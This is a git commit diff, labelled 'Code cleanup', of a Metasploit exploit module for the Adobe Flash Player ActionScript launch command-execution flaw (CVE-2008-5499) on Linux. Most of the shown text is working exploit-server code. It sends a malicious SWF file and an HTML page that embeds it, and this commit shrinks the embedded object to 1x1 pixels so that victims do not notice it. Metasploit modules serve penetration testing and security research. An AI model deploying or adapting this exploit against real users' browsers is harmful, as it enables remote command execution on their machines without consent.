Code cleanup
parent
443f19abcf
commit
860add8dfe
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id: $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -20,27 +16,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in Adobe Flash Player for Linux, version
|
||||
10.0.12.36 and 9.0.151.0 and prior.
|
||||
An input validation vulnerability allows command execution when the browser loads
|
||||
a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method.
|
||||
This module exploits a vulnerability in Adobe Flash Player for Linux,
|
||||
version 10.0.12.36 and 9.0.151.0 and prior.
|
||||
An input validation vulnerability allows command execution when the browser
|
||||
loads a SWF file which contains shell metacharacters in the arguments to
|
||||
the ActionScript launch method.
|
||||
|
||||
The victim must have Adobe AIR installed for the exploit to work. This module was tested against
|
||||
version 10.0.12.36 (10r12_36).
|
||||
The victim must have Adobe AIR installed for the exploit to work. This module
|
||||
was tested against version 10.0.12.36 (10r12_36).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
|
||||
'Unknown' # PoC
|
||||
],
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2008-5499'],
|
||||
['OSVDB', '50796'],
|
||||
['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],
|
||||
['POC', 'http://www.securityfocus.com/bid/32896/exploit'],
|
||||
['URL', 'http://www.securityfocus.com/bid/32896/exploit']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -68,13 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
|
||||
trigger = @swf
|
||||
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
|
||||
|
||||
obj_id = rand_text_alpha(rand(6)+3)
|
||||
|
||||
if request.uri.match(/\.swf/i)
|
||||
print_status("Sending Exploit SWF")
|
||||
print_status("#{msg} Sending Exploit SWF")
|
||||
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
|
||||
return
|
||||
end
|
||||
|
@ -90,13 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</head>
|
||||
<body>
|
||||
<center>
|
||||
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
|
||||
id="#{obj_id}" width="600" height="400"
|
||||
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
|
||||
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
|
||||
<param name="movie" value="#{get_resource}#{trigger_file}" />
|
||||
<embed src="#{get_resource}#{trigger_file}" quality="high"
|
||||
width="320" height="300" name="#{obj_id}" align="middle"
|
||||
allowNetworking="all"
|
||||
<embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"
|
||||
type="application/x-shockwave-flash"
|
||||
pluginspage="http://www.macromedia.com/go/getflashplayer">
|
||||
</embed>
|
||||
|
@ -106,9 +98,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
EOS
|
||||
|
||||
print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{msg} Sending HTML...")
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue